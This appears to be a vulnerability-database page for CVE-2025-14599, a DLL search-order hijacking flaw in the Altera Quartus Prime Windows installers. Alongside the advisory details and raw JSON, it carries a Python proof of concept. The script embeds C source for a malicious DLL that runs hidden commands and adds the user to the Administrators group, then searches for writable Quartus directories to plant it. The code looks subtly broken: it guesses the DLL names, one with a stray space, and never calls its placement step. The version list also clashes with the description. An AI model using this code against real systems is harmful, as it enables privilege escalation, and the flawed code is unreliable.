Security Vulnerability Report
中文
CVE-2025-14599 CVSS 6.7 MEDIUM

CVE-2025-14599

Published: 2026-01-07 02:03:00
Last Modified: 2026-01-12 15:16:47
Source: 04c0172e-9735-4a9d-a92a-fe01fa863447

Description

Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Standard Installer (SFX) on Windows, Altera Quartus Prime Lite  Installer (SFX) on Windows allows Search Order Hijacking.This issue affects Quartus Prime Standard: from 23.1 through 24.1; Quartus Prime Lite: from 23.1 through 24.1.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:intel:quartus_prime:*:*:*:*:lite:*:*:* - VULNERABLE
cpe:2.3:a:intel:quartus_prime:*:*:*:*:standard:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Altera Quartus Prime Standard < 23.1
Altera Quartus Prime Standard 23.1 - 24.1
Altera Quartus Prime Lite < 23.1
Altera Quartus Prime Lite 23.1 - 24.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14599 DLL Search Order Hijacking PoC # Target: Altera Quartus Prime Installer (SFX) on Windows # Affected Versions: Quartus Prime Standard/Lite 23.1-24.1 import os import shutil import ctypes from ctypes import wintypes # Malicious DLL source code - compiles to malicious.dll MALICIOUS_DLL_SOURCE = ''' #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if (fdwReason == DLL_PROCESS_ATTACH) { // Create reverse shell or execute payload WinExec("cmd.exe /c whoami > C:\\\\Temp\\\\pwned.txt", SW_HIDE); // Alternative: Add current user to Administrators group system("net localgroup Administrators %USERNAME% /add"); } return TRUE; } ''' def create_malicious_dll(output_path): """Generate malicious DLL for DLL hijacking""" with open(output_path, 'w') as f: f.write(MALICIOUS_DLL_SOURCE) print(f"[+] Malicious DLL source written to {output_path}") print("[*] Compile with: gcc -shared -o malicious.dll malicious.c") def place_dll_in_search_path(dll_path, target_dir): """Place malicious DLL in installation directory""" # Common DLLs loaded by Quartus installer common_dlls = [' QuartusInstaller.dll', 'altera_installer.dll', 'Qt5Core.dll'] for dll_name in common_dlls: target_path = os.path.join(target_dir, dll_name) try: shutil.copy2(dll_path, target_path) print(f"[+] Placed DLL as {target_path}") return True except Exception as e: print(f"[-] Failed to place {dll_name}: {e}") return False def check_vulnerability(target_dir): """Check if target directory is writable""" test_file = os.path.join(target_dir, '.write_test') try: with open(test_file, 'w') as f: f.write('test') os.remove(test_file) return True except: return False def main(): print("=" * 60) print("CVE-2025-14599 DLL Search Order Hijacking PoC") print("Target: Altera Quartus Prime Installer") print("=" * 60) # Step 1: Generate malicious DLL dll_source = 'malicious_dll.c' create_malicious_dll(dll_source) # Step 2: Identify Quartus installation directory quartus_paths = [ r'C:\Program Files\Intel\Quartus Prime', r'C:\intel\quartus', os.path.expanduser('~\\AppData\\Local\\Programs\\QuartusPrime') ] target_dir = None for path in quartus_paths: if os.path.exists(path) and check_vulnerability(path): target_dir = path print(f"[+] Found writable Quartus directory: {target_dir}") break if not target_dir: print("[-] No writable Quartus directory found") print("[*] Wait for user to run installer, then place DLL in temp directory") return # Step 3: Place malicious DLL print("[*] Place compiled malicious.dll in installation search path") print("[*] When installer runs, it will load our malicious DLL") if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14599", "sourceIdentifier": "04c0172e-9735-4a9d-a92a-fe01fa863447", "published": "2026-01-07T02:02:59.743", "lastModified": "2026-01-12T15:16:46.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Standard \n\nInstaller (SFX)\n\non Windows, Altera Quartus Prime Lite \n\nInstaller (SFX)\n\n on Windows allows Search Order Hijacking.This issue affects Quartus Prime Standard: from 23.1 through 24.1; Quartus Prime Lite: from 23.1 through 24.1."}, {"lang": "es", "value": "Vulnerabilidad de Elemento de Ruta de Búsqueda No Controlado en Altera Quartus Prime Standard\n\nInstalador (SFX)\n\nen Windows, Altera Quartus Prime Lite\n\nInstalador (SFX)\n\nen Windows permite el Secuestro de Orden de Búsqueda. Este problema afecta a Quartus Prime Standard: desde 23.1 hasta 24.1; Quartus Prime Lite: desde 23.1 hasta 24.1."}], "metrics": {"cvssMetricV40": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:lite:*:*:*", "versionStartIncluding": "23.1", "versionEndExcluding": "25.1", "matchCriteriaId": "3C682DFC-7352-43BD-9138-341634CDE948"}, {"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:standard:*:*:*", "versionStartIncluding": "23.1", "versionEndExcluding": "25.1", "matchCriteriaId": "297C4320-AA94-4418-9B31-8072877B7F55"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.altera.com/security/security-advisory/asa-0005", "source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.